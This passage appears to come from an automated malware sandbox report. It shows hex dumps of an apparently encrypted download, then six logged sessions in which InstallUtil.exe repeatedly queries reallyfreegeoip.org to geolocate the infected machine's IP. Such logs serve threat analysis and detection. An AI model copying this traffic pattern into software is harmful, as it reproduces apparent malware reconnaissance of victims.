                                                              Data Ascii: oFXO<&T7" pM,3R;wDj!Gi6jr!_Rp;6%VeZ\}5'RR+yU~|N'c}ty"RSlbmHihF0#Y^Hp^`s6PwFo[#jhc+XKdK5V
                                                              2024-11-11 04:16:53 UTC8000INData Raw: ab 13 12 ca a5 5e b2 c8 29 4a ae 7c c1 20 0d 41 29 12 ec e4 76 80 26 1c e2 45 9b c1 03 bc a8 8f 2a ca f5 51 b1 0b eb 03 39 5b e3 c6 7b b8 66 f6 5e a2 12 e7 f5 5e 88 09 85 b1 18 89 36 1d e3 07 4d 17 54 53 6b 2f 50 b2 dd d5 c0 0c 56 9b 3f 22 83 5a d3 20 e0 14 e8 a4 b4 4f dd dc e4 40 f3 32 9d 4c 72 ce 33 dd 7f 88 eb ed 8f fc 58 3e 13 ef 10 1b bb 54 f3 f1 95 a3 8c 3d dd cd 8e 60 b4 45 5c 1e e7 ed 32 df e9 17 4a e7 b2 35 6c 85 e0 2f cf 41 f0 bc b3 f6 7d 7e ed 17 25 59 89 53 b8 4b 03 41 69 b6 ae e9 49 5f cf 0a c0 8c 0c aa 8a cd b5 c5 ea 20 88 76 4a da ed 94 9b ad b9 ff d2 46 d3 0e 4f 18 64 fa cb 2b 39 72 17 bb 31 fe e3 44 c0 6e 73 16 a8 63 7f 58 8e f2 aa fa 24 18 27 c5 4d 0e 8d 85 43 4b 03 b8 01 b0 c4 dc 7b ee 2e 74 01 e9 51 84 30 5c a4 e0 2b 13 c7 01 16 19 3e
                                                              Data Ascii: ^)J| A)v&E*Q9[{f^^6MTSk/PV?"Z O@2Lr3X>T=`E\2J5l/A}~%YSKAiI_ vJFOd+9r1DnscX$'MCK{.tQ0\+>
                                                              2024-11-11 04:16:53 UTC8000INData Raw: e2 6e b4 3b c0 3d dd 92 d4 84 5c f7 08 ad 16 86 77 24 22 b4 f2 bd 73 b4 87 17 10 98 40 1a 5a fa a4 e6 5e 87 b7 02 e7 13 e1 63 8d 42 24 9b 06 9d 2a 72 8f 12 d0 54 2e f0 32 ff 27 67 24 a6 98 d9 64 07 b4 4a 04 03 92 c4 53 86 66 9f 71 37 57 88 32 62 cb 1c 70 15 ab 36 86 71 05 06 c1 d6 65 a6 21 94 f0 0c 41 ec ef 7f e5 c0 a0 7d 9a ee 6f bf e6 ba 6c 9a 10 1d ff 1c 81 a7 42 07 7f cb a4 ed 1f a3 86 90 bf 7b 94 46 f9 db 1e 3f b7 7a 6b 7a 99 a9 7f 36 9a 3f ea 16 65 a8 60 b9 af 27 cd b4 73 4f 6a 62 3d b1 32 73 1c 15 2f e0 d6 bc 3d fa c5 f9 2c d0 c4 c5 c7 e6 a0 31 5c 6e ef 06 82 b0 84 b5 cc 11 04 f0 fd d3 d2 b1 c9 dd 57 49 23 aa 47 ed 4e ac 54 73 1b df 4e 4d 9f 39 f5 8d 67 54 2c 30 a9 44 f7 a5 0f 96 87 66 07 1d 3b 3a c5 4a da 79 20 72 4d a8 22 a2 53 5e b1 d0 96 c2 bc
                                                              Data Ascii: n;=\w$"s@Z^cB$*rT.2'g$dJSfq7W2bp6qe!A}olB{F?zkz6?e`'sOjb=2s/=,1\nWI#GNTsNM9gT,0Df;:Jy rM"S^
                                                              2024-11-11 04:16:53 UTC8000INData Raw: 42 2a 18 6f f6 14 76 b8 86 35 de e2 a8 ff bf 6a 7d 29 90 ee 7f f2 00 4d c1 db dd ab 77 9c 0f 17 e2 c8 4b b0 8e 4b 62 3c 8e 10 a3 5a bf a3 ae 1c 2c 25 d2 b0 6a 97 91 65 b5 dd 67 fa 77 8a 0c f5 1c cc 97 4d a4 14 01 b0 e2 fa 28 67 0c 53 57 fc 54 63 4f 41 34 ad b6 97 cc 13 dd ac 4d b0 81 96 ff 18 0c c5 0f 6c 77 4b 54 d2 db 1d 98 f4 9a 36 55 96 ad 9c d3 86 b6 12 26 fe 3c b5 7f 06 b2 a5 12 3e 64 d8 85 49 7d bd b9 b7 43 20 f7 d1 56 f8 6d 28 a1 4a 9e 9b 55 d0 69 a3 90 12 21 0d d5 59 40 6a ba c7 30 4b 8c a4 be 14 5e 61 77 9a cc 81 89 fe 7f 8c f8 78 eb c6 d5 0f 69 1e 7d 0d 47 bd 14 c6 ff 5f a2 83 2a 1d 78 0d b3 e3 19 cd 6f 8a d1 6f c0 69 ab 63 31 86 4a 05 a7 8d c0 43 d4 57 1d ab a0 36 70 8d 8c 1a 90 78 4b 68 ea 8d 7e 60 89 60 61 f3 19 90 c3 c7 83 ba e7 03 b8 74 44
                                                              Data Ascii: B*ov5j})MwKKb<Z,%jegwM(gSWTcOA4MlwKT6U&<>dI}C Vm(JUi!Y@j0K^awxi}G_*xooic1JCW6pxKh~``atD
                                                              2024-11-11 04:16:53 UTC8000INData Raw: 2e f4 13 62 28 a0 fa f7 96 e2 45 9d d9 7d dd d4 9b 9b 6b 7b 84 46 db 4a 8d ee d8 1e d3 23 5b a9 3e 05 91 26 a9 22 37 13 df 94 62 ae 09 0c 5a e1 0f c7 b9 fd a3 e0 dd 5b 30 4d 95 47 fa 8b 4a 20 14 f3 9d cc 2d e9 ff 42 05 b4 a8 6d c2 20 30 c6 9b 69 9d 5e 84 4d 52 2b 04 1d 52 4a 6b 11 01 43 6e 7c e4 b7 f0 30 77 d7 02 a3 70 c6 d1 9b 83 6d 2c a0 eb a4 11 32 a3 2f 20 28 cd 27 51 7c ae 8e 2f 5c 59 b7 2f 3b ce c8 4e 2d b9 2f 42 f6 9b 32 68 8f 78 c8 3b 24 55 10 94 28 93 c3 34 03 4c af 75 e2 dc 9e 98 b7 eb 51 8d 8d 26 e0 37 34 5b 94 9e 5f b0 b2 5f a2 e8 3a a8 10 51 72 a2 b7 69 de f1 d0 ab 9e b9 52 c4 56 ec 99 7f 72 93 3b 69 81 39 a8 6f 90 00 eb 2a 73 1e 06 f3 06 91 fe 15 be 17 88 e8 fe db 85 f8 50 3c 17 38 f6 16 62 56 2d fc a2 03 70 7a ca 3b 71 48 ff 5d 00 7f 5a 40
                                                              Data Ascii: .b(E}k{FJ#[>&"7bZ[0MGJ -Bm 0i^MR+RJkCn|0wpm,2/ ('Q|/\Y/;N-/B2hx;$U(4LuQ&74[__:QriRVr;i9o*sP<8bV-pz;qH]Z@
                                                              2024-11-11 04:16:53 UTC8000INData Raw: f2 d8 2a 18 ca 23 8b 8d ac 2b 1a d6 d5 e9 b9 1c d9 5b 90 97 b9 a2 1a a6 60 43 c7 3d 90 e2 a6 a6 4a e8 a0 75 85 72 16 88 03 0a 5b a0 d9 08 52 a1 89 4b 5c d5 13 6a 3b 44 f7 8a 42 b3 79 ca ba 2a 3b 06 13 93 1b d4 1d e7 db d3 44 6f 3e 5b 6f cd 22 88 5f 43 3f e1 b8 61 5e 63 07 0e cc 02 37 1e fa d0 d7 db dc d1 8a ad 47 86 5d ba 97 29 29 69 6f 4d 21 be 25 5c b7 26 87 8a d2 74 89 f3 03 95 4a 80 8e 8c ff 78 9f 99 a4 26 5a 8e d0 8d 51 eb 3d b7 00 ba 49 fe 24 d2 d6 82 76 28 84 92 c0 f0 58 d1 41 6f e6 e5 5f 5b 78 40 d5 3f 78 35 c7 0d f4 16 c4 a9 d7 1e 38 19 1d 81 13 31 a3 8e fe f1 c2 6f ba 42 e9 9b 53 42 9f cd 82 0d 3f a7 f4 a5 74 33 ec 23 b7 0a 13 fe b7 34 8c 84 66 7b df ce b5 bf af 7a 35 7f ff 75 3a 36 af 39 7b 47 b2 7a f4 b4 2f 7c a7 86 a5 0c 2f 88 a7 af af 1f 1b
                                                              Data Ascii: *#+[`C=Jur[RK\j;DBy*;Do>[o"_C?a^c7G]))ioM!%\&tJx&ZQ=I$v(XAo_[x@?x581oBSB?t3#4f{z5u:69{Gz/|/
                                                              2024-11-11 04:16:53 UTC8000INData Raw: d2 d0 e6 c8 7e a5 f3 dd 7e ca a3 4e a1 9c a3 33 8d 85 3b 6b c3 19 2c 8e 5e 06 54 1a 68 82 c3 03 31 02 af ba d2 f9 bb bb fa 2f 33 e2 ea 4d 7a bd 67 d1 47 0b d6 a4 1e d4 f5 7b b4 18 84 23 ad 82 bd 72 fe e3 12 28 cd cd 11 a2 db cc 19 f2 11 1a ff 24 34 98 4c 5b f6 78 31 c4 f3 74 da b9 ed 94 2b bb 19 c0 5f 3d 10 16 78 39 de fd b0 c2 04 f2 25 a0 a3 f8 7d 28 44 5c f3 c2 ac b9 0a 0e 85 98 e0 2b 97 3a 86 84 53 32 fc d1 76 0b 1b a4 84 34 f7 2c fe 77 9f 4c f4 8f c6 cd ec 33 3a 75 9e f2 61 6d 11 bf 63 bf 43 b5 9e 13 70 29 b2 ee 8a 46 a3 e4 ee 49 2c 8f 52 87 76 ab d0 99 c9 1c 75 bb d1 84 f1 89 24 26 fe 80 7f 3d 7d b2 ac 36 8b 2d c5 85 21 e3 72 d4 e5 2b 41 d4 26 55 d4 e9 4d 50 f8 87 61 d4 a1 91 a3 e3 ee d9 f9 f2 d4 2a b0 37 b4 a9 8f eb 2c 02 f0 37 d7 2e 03 ad dc b4 60
                                                              Data Ascii: ~~N3;k,^Th1/3MzgG{#r($4L[x1t+_=x9%}(D\+:S2v4,wL3:uamcCp)FI,Rvu$&=}6-!r+A&UMPa*7,7.`
                                                              2024-11-11 04:16:53 UTC8000INData Raw: c0 8f d5 e4 6f 93 84 df 0a 70 6b c7 89 77 d7 5c df ba 14 19 d6 de 81 ab e9 5b 47 80 55 4d 07 5f 0a 02 10 e6 23 aa 4f 9b 73 39 93 f5 f8 af 9a 31 39 bc 9f 8c b8 b9 cf df 51 ee 55 ef 46 99 44 e2 6c e1 be 6a 69 ea de 9f 56 db d0 fb 83 af 28 6e 87 21 c6 7f 97 61 73 40 ab f0 fc b3 be b5 3c b6 59 80 99 c1 16 d4 02 4e df 54 c1 53 28 a0 c8 ec d0 a2 6f f0 d7 98 5d f9 d1 bb 10 bd 74 0b 07 dc 06 3a 67 86 8c ac 83 ba b0 2e a5 16 5a 48 ef c5 49 cf 1c 9a 2d 5f 4f b5 22 e0 a4 b9 d0 19 52 3b 5a 78 28 ce 65 b7 fe 0b a5 90 ba f0 c3 e5 b8 eb 67 31 a2 1f ec ae 0a 8b f6 4e a8 b6 14 ad d7 66 51 51 0e f2 0d ab ac 19 b9 7a 5e d3 bb 21 36 51 e2 a7 33 32 e6 fe 08 31 f3 b6 cf 6e 61 f2 b1 f7 20 8e 1f 93 09 ae 95 b5 79 1b a0 e3 26 b3 0f 84 49 59 1b 7e a6 79 6e 2b 07 06 e5 fd 23 75 d0
                                                              Data Ascii: opkw\[GUM_#Os919QUFDljiV(n!as@<YNTS(o]t:g.ZHI-_O"R;Zx(eg1NfQQz^!6Q321na y&IY~yn+#u


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              1192.168.2.549706188.114.96.34431436C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-11-11 04:16:57 UTC86OUTGET /xml/66.23.206.109 HTTP/1.1
                                                              Host: reallyfreegeoip.org
                                                              Connection: Keep-Alive
                                                              2024-11-11 04:16:57 UTC839INHTTP/1.1 200 OK
                                                              Date: Mon, 11 Nov 2024 04:16:57 GMT
                                                              Content-Type: text/xml
                                                              Content-Length: 363
                                                              Connection: close
                                                              Cache-Control: max-age=31536000
                                                              CF-Cache-Status: MISS
                                                              Last-Modified: Mon, 11 Nov 2024 04:16:57 GMT
                                                              Accept-Ranges: bytes
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tM5YmCthsoj3vjzbycqikT34TZYAAYiZFBvW%2ByFWEMhCUo%2BCsO%2FEMLuSJkiZTPf7XN7aMxI9aZP2Jk0F7Dw9ynoUgAn1asbgW5DYoabnxdCC4WCgHE2ipR85O2ddmmAxYBs870XI"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8e0b7845cc0f0f80-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1291&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=700&delivery_rate=2292953&cwnd=243&unsent_bytes=0&cid=966992ebb9e02c84&ts=898&x=0"
                                                              2024-11-11 04:16:57 UTC363INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 36 36 2e 32 33 2e 32 30 36 2e 31 30 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a
                                                              Data Ascii: <Response><IP>66.23.206.109</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZ


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              2192.168.2.549707188.114.96.34431436C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-11-11 04:16:58 UTC62OUTGET /xml/66.23.206.109 HTTP/1.1
                                                              Host: reallyfreegeoip.org
                                                              2024-11-11 04:16:58 UTC852INHTTP/1.1 200 OK
                                                              Date: Mon, 11 Nov 2024 04:16:58 GMT
                                                              Content-Type: text/xml
                                                              Content-Length: 363
                                                              Connection: close
                                                              Cache-Control: max-age=31536000
                                                              CF-Cache-Status: HIT
                                                              Age: 1
                                                              Last-Modified: Mon, 11 Nov 2024 04:16:57 GMT
                                                              Accept-Ranges: bytes
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FHrh%2BfLljH9rrsz6GU5tl7weFTENEoJ4G4aWSzgyMlMWbdhjftzMa%2FTfKQpH6Bt25pF%2BKic7Erqa1rcdO%2BI5SHOAXoEikSFMo9IQhHcIjaXlU84YwT6E5WAUMPZYMiKmC3CiY%2F38"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8e0b784ca9d672b3-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1308&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=700&delivery_rate=2184012&cwnd=251&unsent_bytes=0&cid=bb4a1c1e3d2a1f96&ts=122&x=0"
                                                              2024-11-11 04:16:58 UTC363INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 36 36 2e 32 33 2e 32 30 36 2e 31 30 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a
                                                              Data Ascii: <Response><IP>66.23.206.109</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZ


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              3192.168.2.549709188.114.96.34431436C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-11-11 04:16:59 UTC86OUTGET /xml/66.23.206.109 HTTP/1.1
                                                              Host: reallyfreegeoip.org
                                                              Connection: Keep-Alive
                                                              2024-11-11 04:17:00 UTC848INHTTP/1.1 200 OK
                                                              Date: Mon, 11 Nov 2024 04:17:00 GMT
                                                              Content-Type: text/xml
                                                              Content-Length: 363
                                                              Connection: close
                                                              Cache-Control: max-age=31536000
                                                              CF-Cache-Status: MISS
                                                              Last-Modified: Mon, 11 Nov 2024 04:17:00 GMT
                                                              Accept-Ranges: bytes
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N%2FqGZTZx0YexjC1elktikxL6fsBpq8fadPC4O08AGB2qHtv%2B%2BTN6GKrb4Vnhu0uFa5HVJ1y%2F0rubaSwWbHSL5Fs4b8xvYrfxPQIu%2F%2FMOiVHjd5tiISuYq79W%2BUp%2BDWSUY5vyjv6E"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8e0b7856de0c80fb-NRT
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=156230&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=700&delivery_rate=18531&cwnd=32&unsent_bytes=0&cid=2f3a7f1e022e5fc9&ts=818&x=0"
                                                              2024-11-11 04:17:00 UTC363INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 36 36 2e 32 33 2e 32 30 36 2e 31 30 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a
                                                              Data Ascii: <Response><IP>66.23.206.109</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZ


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              4192.168.2.549711188.114.96.34431436C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-11-11 04:17:01 UTC62OUTGET /xml/66.23.206.109 HTTP/1.1
                                                              Host: reallyfreegeoip.org
                                                              2024-11-11 04:17:01 UTC852INHTTP/1.1 200 OK
                                                              Date: Mon, 11 Nov 2024 04:17:01 GMT
                                                              Content-Type: text/xml
                                                              Content-Length: 363
                                                              Connection: close
                                                              Cache-Control: max-age=31536000
                                                              CF-Cache-Status: HIT
                                                              Age: 4
                                                              Last-Modified: Mon, 11 Nov 2024 04:16:57 GMT
                                                              Accept-Ranges: bytes
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wzq5oJbVOK2kXn3a4G8O%2BelkCYNkk0lkyll5XRobzJgEN2BpVgdu%2Bi4%2Boeatao2sdcB5iIZNb%2BFbzPyTJCWCnPIipTsxNVsEo8vzvWpeb3ra2a4XeDVqilsuaGMK3%2BDtmaG%2FhKpl"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8e0b78622dcede97-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1128&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=700&delivery_rate=2413333&cwnd=208&unsent_bytes=0&cid=188bee9d59f55bb1&ts=107&x=0"
                                                              2024-11-11 04:17:01 UTC363INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 36 36 2e 32 33 2e 32 30 36 2e 31 30 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a
                                                              Data Ascii: <Response><IP>66.23.206.109</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZ


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              5192.168.2.549713188.114.96.34431436C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-11-11 04:17:02 UTC62OUTGET /xml/66.23.206.109 HTTP/1.1
                                                              Host: reallyfreegeoip.org
                                                              2024-11-11 04:17:03 UTC846INHTTP/1.1 200 OK
                                                              Date: Mon, 11 Nov 2024 04:17:03 GMT
                                                              Content-Type: text/xml
                                                              Content-Length: 363
                                                              Connection: close
                                                              Cache-Control: max-age=31536000
                                                              CF-Cache-Status: HIT
                                                              Age: 6
                                                              Last-Modified: Mon, 11 Nov 2024 04:16:57 GMT
                                                              Accept-Ranges: bytes
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ONWN11y6kRAjar3Va%2FISwUeYts0oYYo03dJQ0tf7papVvg79qOnilRO11r2gvLz6IWsC44T8mzFcO7gVFUshqfQX4Sn9ciLJDBkn3qffBKAxkDYfl3uD%2BKBkEuhx1bXSvCTWa%2BKZ"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8e0b7869ccfac34a-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1382&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=700&delivery_rate=2159582&cwnd=250&unsent_bytes=0&cid=132ad932efc45d56&ts=118&x=0"
                                                              2024-11-11 04:17:03 UTC363INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 36 36 2e 32 33 2e 32 30 36 2e 31 30 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a
                                                              Data Ascii: <Response><IP>66.23.206.109</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZ


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              6192.168.2.549715188.114.96.34431436C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-11-11 04:17:04 UTC86OUTGET /xml/66.23.206.109 HTTP/1.1
                                                              Host: reallyfreegeoip.org
                                                              Connection: Keep-Alive
                                                              2024-11-11 04:17:04 UTC848INHTTP/1.1 200 OK
                                                              Date: Mon, 11 Nov 2024 04:17:04 GMT
                                                              Content-Type: text/xml
                                                              Content-Length: 363
                                                              Connection: close
                                                              Cache-Control: max-age=31536000
                                                              CF-Cache-Status: HIT
                                                              Age: 7
                                                              Last-Modified: Mon, 11 Nov 2024 04:16:57 GMT
                                                              Accept-Ranges: bytes
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cTXSmA8luHts2ycUxc2hVUqxjLjuOZgbZLRwsEmimgHwYdR%2Fd2ZBc5MVY3TzCGSDMsAWUED9kEnn2tn0gtZQ7hACqAiEXFlZrR8Yw3Qu7qL%2FGF6uhIUUS%2B2xVz9FXWAVpetmuRW%2F"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8e0b78715dde0f71-EWR
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1291&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=700&delivery_rate=2464680&cwnd=251&unsent_bytes=0&cid=c7ed5a698b10dbdb&ts=116&x=0"
                                                              2024-11-11 04:17:04 UTC363INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 36 36 2e 32 33 2e 32 30 36 2e 31 30 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a
                                                              Data Ascii: <Response><IP>66.23.206.109</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZ


